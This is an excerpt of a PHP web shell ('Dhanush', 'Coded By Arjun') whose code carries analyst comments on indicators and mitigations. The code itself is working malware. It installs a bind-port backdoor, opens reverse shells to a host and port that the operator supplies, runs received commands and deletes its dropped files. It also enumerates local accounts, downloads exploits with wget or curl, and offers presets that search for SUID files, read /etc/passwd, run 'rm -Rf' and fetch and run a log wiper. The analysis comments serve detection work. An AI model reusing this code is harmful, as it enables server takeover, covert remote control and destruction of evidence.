 // Analyst note: persistence handler selected by the POST field "backdoor". It needs the
 // POST fields "passwd", "port" and "lang". It decodes one of the embedded payloads
 // ($bind_port_c or $bind_port_p, both defined earlier in the file as compressed base64
 // text) to disk and starts it in the background with the port and password as
 // arguments. The payload source is not readable in this excerpt; the variable names and
 // the arguments suggest a password-protected listener, which should be confirmed by
 // decoding a copy of the sample in an isolated analysis environment.
 // Indicators on disk: backp.c and the compiled backp, or bp.pl, in the shell's working
 // directory, or under /tmp when the working directory is not writable. Nothing in this
 // handler deletes them.
 // Indicators at runtime: gcc or perl started by the web server account, a long-lived
 // process whose command line contains "backp" or "bp.pl" followed by a port number, and
 // a listening socket owned by the web server account on a port the application does not
 // use. Removing the PHP file does not stop that process; it has to be found and killed
 // separately. A compiler on a production web host is what makes the C variant possible.
5884 if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
5885 { ?><script type="text/javascript">gethome('connect');</script><?php
5886 $passwd = $_POST['passwd'];
5887
5888 if($_POST['lang'] == 'c')
5889 {
5890 if(is_writable("."))
5891 {
5892 @$fh=fopen(getcwd()."/backp.c",'w');
5893 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
5894 @fclose($fh);
5895 execmd("chmod 0755 ".getcwd()."/backp.c");
5896 execmd("gcc -o ".getcwd()."/backp ".getcwd()."/backp.c");
5897 execmd("chmod 0755 ".getcwd()."/backp");
5898 execmd(getcwd()."/backp"." ".$_POST['port']." ". $passwd ." &");
5899 $scan = exec_all("ps aux | grep backp".$_POST['port']);
5900 if(eregi("backp".$_POST['port'],$scan))
5901 $bdmessage = "Process found running, backdoor setup successfully.";
5902 else
5903 $bdmessage = "Process not found running, backdoor not setup successfully.";
5904 }
5905 else
5906 {
5907 @$fh=fopen("/tmp/backp.c","w");
5908 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
5909 @fclose($fh);
5910 execmd("chmod 0755 /tmp/backp.c");
5911 execmd("gcc -o /tmp/backp /tmp/backp.c");
5912 $out = execmd("/tmp/backp"." ".$_POST['port']." ". $passwd ." &");
5913 $scan = exec_all("ps aux | grep backp".$_POST['port']);
5914 if(eregi("backp".$_POST['port'],$scan))
5915 $bdmessage = "Process found running, backdoor setup successfully.";
5916 else
5917 $bdmessage = "Process not found running, backdoor not setup successfully.";
5918 }
5919 }
5920 if($_POST['lang'] == 'perl')
5921 {
5922 if(is_writable("."))
5923 {
5924 @$fh=fopen(getcwd()."/bp.pl",'w');
5925 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
5926 @fclose($fh);
5927 execmd("chmod 0755 ".getcwd()."/bp.pl");
5928 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
5929
5930 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
5931 }
5932 else
5933 {
5934 @$fh=fopen("/tmp/bp.pl","w");
5935 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
5936 @fclose($fh);
5937 execmd("chmod 0755 ".getcwd()."/bp.pl");
5938 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
5939 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
5940 }
5941 }
5942 }
5943}
5944else if(isset($_POST['backconnect']))
5945{
 // Analyst note: outbound-connection handler selected by the POST field "backconnect".
 // The destination comes from the POST fields "ip" and "port"; "lang" picks one of three
 // variants (perl, python, php).
 // Perl and Python variants: an embedded payload ($backconnect_perl or $back_connect_p) is
 // decoded to bc.pl or bc.py in the working directory, or under /tmp when that directory
 // is not writable, started in the background with host and port as arguments, and the
 // file is then unlinked. The script is therefore normally gone from disk while its
 // process may still be running, so look at the process list (perl or python started by
 // the web server account with "bc.pl" or "bc.py" in the command line) and at open
 // outbound connections, not only at the file system.
 // PHP variant: the PHP worker itself opens the connection with fsockopen(), writes a
 // banner plus the output of pwd, uname -a and id, then loops reading a line from the
 // socket and writing back the result of exec_all() on it until the peer closes. That
 // shows up as a long-running PHP request holding an outbound socket.
 // Network signatures from this block: the banner text "Coded By Arjun" and the prompt
 // "(dhanush)[$]> " are written to the socket exactly as shown.
 // Mitigation: default-deny egress from web servers to the internet blocks all three
 // variants irrespective of which payload is used.
5946 if($_POST['ip'] != "" && $_POST['port'] != "")
5947 { ?><script type="text/javascript">gethome('connect');</script><?php
5948 $host = $_POST['ip'];
5949 $port = $_POST['port'];
5950 if($_POST["lang"] == "perl")
5951 {
5952 if(is_writable("."))
5953 {
5954 @$fh=fopen(getcwd()."/bc.pl",'w');
5955 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
5956 @fclose($fh);
5957 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5958 execmd("perl ".getcwd()."/bc.pl $host $port &",$disable);
5959 if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
5960 }
5961 else
5962 {
5963 @$fh=fopen("/tmp/bc.pl","w");
5964 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
5965 @fclose($fh);
5966 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5967 execmd("perl /tmp/bc.pl $host $port &",$disable);
5968 if(!@unlink("/tmp/bc.pl"))
5969 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
5970 }
5971 }
5972 else if($_POST["lang"] == "python")
5973 {
5974 if(is_writable("."))
5975 {
5976 $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error());
5977 if($w_file)
5978 {
5979 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
5980 @fclose($w_file);
5981 chmod(getcwd().'/bc.py', 0777);
5982 }
5983 execmd("python ".getcwd()."/bc.py $host $port &",$disable);
5984 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5985
5986 if(!@unlink(getcwd()."/bc.py"))
5987 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
5988 }
5989 else
5990 {
5991 $w_file=@fopen("/tmp/bc.py","w");
5992 if($w_file)
5993 {
5994 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
5995 @fclose($w_file);
5996 chmod('/tmp/bc.py', 0777);
5997 }
5998 execmd("python /tmp/bc.py $host $port &",$disable);
5999 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
6000 if(!@unlink("/tmp/bc.py"))
6001 echo "<h2>Warning: Failed to delete reverse-connection program</h2><br>";
6002 }
6003 }
6004 else if($_POST["lang"] == "php")
6005 {
6006 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
6007 $ip = $_POST['ip'];
6008 $port=$_POST['port'];
6009 $sockfd=fsockopen($ip , $port , $errno, $errstr );
6010 if($errno != 0)
6011 {
6012 $bdmessage = "<font color='red'><b>$errno</b> : $errstr</font>";
6013 }
6014 else if (!$sockfd)
6015 {
6016 $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
6017 }
6018 else
6019 {
6020 fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n=================================================================");
6021 $pwd = exec_all("pwd");
6022 $sysinfo = exec_all("uname -a");
6023 $id = exec_all("id");
6024 $len = 1337;
6025 fputs($sockfd ,$sysinfo . "\n" );
6026 fputs($sockfd ,$pwd . "\n" );
6027 fputs($sockfd ,$id ."\n\n" );
6028 fputs($sockfd ,$dateAndTime."\n\n" );
6029 while(!feof($sockfd))
6030 {
6031 $cmdPrompt ="(dhanush)[$]> ";
6032 fputs ($sockfd , $cmdPrompt );
6033 $command= fgets($sockfd, $len);
6034 fputs($sockfd , "\n" . exec_all($command) . "\n\n");
6035 }
6036 fclose($sockfd);
6037 }
6038 }
6039 }
6040}
6041else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
6042{
 // Analyst note: local account enumeration. For every numeric id from val1 to val2
 // (both taken from the query string) it calls posix_getpwuid() and, when an account
 // exists, appends the colon-joined record to $temp, which is then handed to paramexe()
 // (defined outside this excerpt) under the title 'Users'. The account list is obtained
 // through the POSIX extension rather than by opening /etc/passwd.
 // For detection: both parameters are in the query string, so requests carrying numeric
 // "val1" and "val2" appear in access logs. For hardening: where the application does not
 // need it, adding posix_getpwuid to PHP's disable_functions removes this primitive.
6043 $temp = "";
6044 for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
6045 {
6046 $uid = @posix_getpwuid($_GET['val1']);
6047 if ($uid)
6048 $temp .= join(':',$uid)."\n";
6049 }
6050 echo '<br/>';
6051 paramexe('Users', $temp);
6052}
6053else if(isset($_GET['download']))
6054{
6055 download();
6056}
6057else
6058{
6059 ?><script type="text/javascript">gethome('home','<?php echo addslashes($dir); ?>');</script><?php
6060}
6061$is_writable = is_writable($dir)?"<font class=txt>< writable ></font>":"< not writable >";
6062?>
6063</p><center><div id="showdir"><?php echo $bdmessage; ?></div></center>
6064<table style="width:100%;border-color:#333333;" border="1">
6065<tr>
6066<td align="center">
6067<form method="post" enctype="multipart/form-data">
6068Upload file : <br><input type="file" name="uploadfile" class="box" size="50">
6069<input type="hidden" id=path name="path" value="<?php echo $dir; ?>" />
6070<input type=submit value="Upload" name="u" value="u" class="but" ></form>
6071<span name="wrtble"><?php
6072echo $is_writable; ?></span>
6073 <br>
6074</td>
6075<td align="center" style="height:105px;">Create File :
6076<form onSubmit="createdir('Create',createfile.value);return false;">
6077<input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile" id="createfile">
6078<input type="button" onClick="createdir('Create',createfile.value)" value="Create" class="but">
6079</form><span name="wrtble">
6080<?php echo $is_writable; ?></span>
6081</td>
6082</tr>
6083<tr>
6084<td align="center" style="height:105px;">Execute : <form onSubmit="executemyfile('execute','<?php echo addslashes($dir); ?>',execute.value);return false;">
6085<input type="text" class="box" name="execute">
6086<input type="hidden" id="exepath" name="exepath" value="<?php echo $dir; ?>">
6087 <input type="button" onClick="executemyfile('execute',exepath.value,execute.value)" value="Execute" class="but"></form></td>
6088
6089<td align="center">Create Directory : <form onSubmit="createdir('createfolder',createfolder.value);return false;">
6090<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder" id="createfolder">
6091<input type="button" onClick="createdir('createfolder',createfolder.value)" value="Create" class="but">
6092</form><span name="wrtble"><?php
6093echo $is_writable;
6094?></span></td></tr>
6095<tr><td style="height:105px;" align="center">Get Exploit <form onSubmit="getexploit(wurl.value,path.value,functiontype.value);return false;">
6096<input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c">
6097<input type="button" onClick="getexploit(wurl.value,uppath.value,functiontype.value)" value=" G0 " class="but"><br><br>
6098<input type="hidden" id="uppath" name="uppath" value="<?php echo $dir . $directorysperator; ?>">
6099<select name="functiontype" class="sbox">
6100<option value="wwget">wget</option>
6101<option value="wlynx">lynx</option>
6102<option value="wfread">fread</option>
6103<option value="wfetch">fetch</option>
6104<option value="wlinks">links</option>
6105<option value="wget">GET</option>
6106<option value="wcurl">curl</option>
6107</select>
6108</form><div id="showexp"></div>
6109</td>
6110<td align="center">
6111<form>
6112Some Commands<br>
6113<?php if($os != "Windows")
// Preset-command menu: exactly one of the two <select name="mycmd"> lists below
// is rendered, chosen by $os (assigned outside this excerpt). The Execute button
// that follows this block passes the selected option value to the page's
// executemyfile() JavaScript handler, which is also defined outside this excerpt.
// Analyst note: the option values are emitted verbatim into the page, so the
// distinctive ones (the zap2.c log-wiper entries, "logeraser", the SUID and
// world-writable searches) are stable strings for static signatures when
// scanning web roots or HTTP response bodies for this shell. The log-wiping
// presets also mean local logs on an affected host should not be assumed
// complete; prefer logs that were shipped off-host.
6114{ ?>
6115<SELECT NAME="mycmd" class="box">
6116 <OPTION VALUE="uname -a">Kernel version
6117 <OPTION VALUE="w">Logged in users
6118 <OPTION VALUE="lastlog">Last to connect
6119 <option value='cat /etc/hosts'>IP Addresses
6120 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
6121 <OPTION VALUE="logeraser">Log Eraser
6122 <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
6123 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
6124 <OPTION VALUE="find / -type f -name \"config*\"">find config* files
6125 <OPTION VALUE="find . -type f -name \"config*\"">find config* files in current dir
6126 <OPTION VALUE="find . -type f -perm -04000 -ls">find suid files in current dir
6127 <OPTION VALUE="find / -type f -perm -04000 -ls">find all suid files
6128 <OPTION VALUE="find / -user root -perm -022">find all sgid files
6129 <OPTION VALUE="find . -type f -perm -02000 -ls">find suid files in current dir
6130 <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
6131 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
6132 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
6133 <?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php } ?>
6134 <?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
6135 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
6136 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
6137 <OPTION VALUE="ps aux">Show running proccess
6138 <OPTION VALUE="uptime">Uptime check
6139 <OPTION VALUE="cat /proc/meminfo">Memory check
6140 <OPTION VALUE="netstat -an | grep -i listen">Open ports
6141 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
6142 <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
6143 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
6144 <OPTION VALUE="./zap2">WIPELOGS PT3
6145 <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
6146 </SELECT>
6147 <?php } else {?>
6148 <SELECT NAME="mycmd" class="box">
6149 <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
6150 <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
6151 <OPTION VALUE="systeminfo">System Informations
6152 <OPTION VALUE="net user">User accounts
6153 <OPTION VALUE="netstat -an">Open ports
6154 <OPTION VALUE="getmac">Get Mac Address
6155 <OPTION VALUE="net start">Show running services
6156 <OPTION VALUE="net view">Show computers
6157 <OPTION VALUE="arp -a">ARP Table
6158 <OPTION VALUE="tasklist">Show Process
6159 <OPTION VALUE="ipconfig/all">IP Configuration
6160
6161 </SELECT>
6162 <?php } ?>
6163 <input type="hidden" id="auexepath" name="auexepath" value="<?php echo $dir; ?>">
6164<input type="button" onClick="executemyfile('mycmd',auexepath.value,mycmd.value)" value="Execute" class="but">
6165</form>
6166</td>
6167</tr></table><br>
6168
6169</td>
6170</tr>
6171</table>
6172
6173<?php
6174
6175
6176//logout
6177
// Logout handler: runs whenever a 'logout' query parameter is present.
6178if(isset($_GET['logout']))
6179{
 // The second argument of setcookie() is the cookie VALUE, so this call stores
 // the number time() - 3600 in the "hacked" cookie rather than setting an
 // expiry. The stored value no longer equals md5($pass), which is what the
 // access gate later in the file compares the cookie against.
 // Analyst note: a purely numeric "hacked" cookie in captured traffic or proxy
 // logs is therefore a Unix timestamp one hour before a logout on this shell.
6180 setcookie("hacked",time() - 60*60);
 // Redirects to $self, which is assigned outside this excerpt.
6181 header("Location:$self");
 // Flushes the output buffer opened by ob_start() at the top of the file.
6182 ob_end_flush();
6183}
6184?>
6185
6186
6187<hr color="#1B1B1B">
6188<div align="center">
6189<font size="6" face="Times New Roman, Times, serif" color="#00CC00">धनुष<br>
6190--==Coded By Arjun==--</font><br><a href="http://www.google.com/search?q=%E0%A4%9C%E0%A4%AF%20%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6" target="_blank"><font color="#FF0000" size="6">जय हिन्द</font></a></div>
6191<?php
6192}
6193}
6194
// Login handler: runs only when both POST fields 'uname' and 'passwd' are present.
// Analyst note: POST requests carrying exactly these two field names to a PHP
// file that should not accept logins are a useful web-log / WAF indicator.
6195if(isset($_POST['uname']) && isset($_POST['passwd']))
6196{
 // Loose (==) comparison of the raw submitted values against $user and $pass,
 // which the top of the file sets to the same hard-coded 32-hex-character string.
6197 if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
6198 {
 // Session marker: cookie "hacked" = md5($pass). No expiry, path or flags are
 // passed, and the value depends only on the hard-coded string, so it is
 // constant for this sample and can be matched in captured traffic.
6199 setcookie("hacked", md5($pass));
6200 $selfenter = $_SERVER["PHP_SELF"];
 // Redirect back to the script's own path; the script is not terminated here.
6201 header("Location:$selfenter");
6202 }
6203}
6204
// Access gate: any request without a "hacked" cookie whose value loosely (!=)
// matches md5($pass) is served the login form below.
// Analyst note: the literal strings in this form ("Dhanush",
// "--==Coded By Arjun==--", the field names uname/passwd) are served to every
// unauthenticated visitor and work as content signatures for file and
// response-body scanning.
6205if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
6206{
 // shellstyle() is defined outside this excerpt; presumably it emits the page
 // head and styling - confirm against its definition.
6207 shellstyle();
6208?>
6209 <center>
6210 <form method="POST">
6211 <div style="background-color:#171717; width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px; background-image:url(Windows_7_-_Alien_from_outer_space.jpg);">
6212 <table cellpadding="9" cellspacing="4">
6213 <tr>
6214 <td align="center" colspan="2"><blink><font size="7"><b>Dhanush</b></font></blink></td>
6215 </tr>
6216 <tr>
6217 <td align="right"><b>User Name : </b></td>
6218 <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
6219 </tr>
6220 <tr>
6221 <td align="right"><b>Password : </b></td>
6222 <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
6223 </tr>
6224 <tr>
6225 <td align="center" colspan="2"><input type="submit" class="but" value=" Enter "></td>
6226 </tr>
6227 <tr>
6228 <td align="center" colspan="2"><font size="6" face="Times New Roman, Times, serif"><b>--==Coded By Arjun==--</b></font></td>
6229 </tr>
6230 <tr>
6231 <td colspan="2"><font size="4" face="Times New Roman, Times, serif"><noscript>Enable Javascript in your browser for the proper working of the shell</noscript></font></td>
6232 </tr>
6233 </table>
6234 </div>
6235
6236 </form>
6237 </center>
6238<br>
6239</body>
6240</html>
6241<?php
// End of the unauthenticated branch. The form above has no action attribute,
// so it posts 'uname' and 'passwd' back to the URL the page was served from.
6242}
6243?>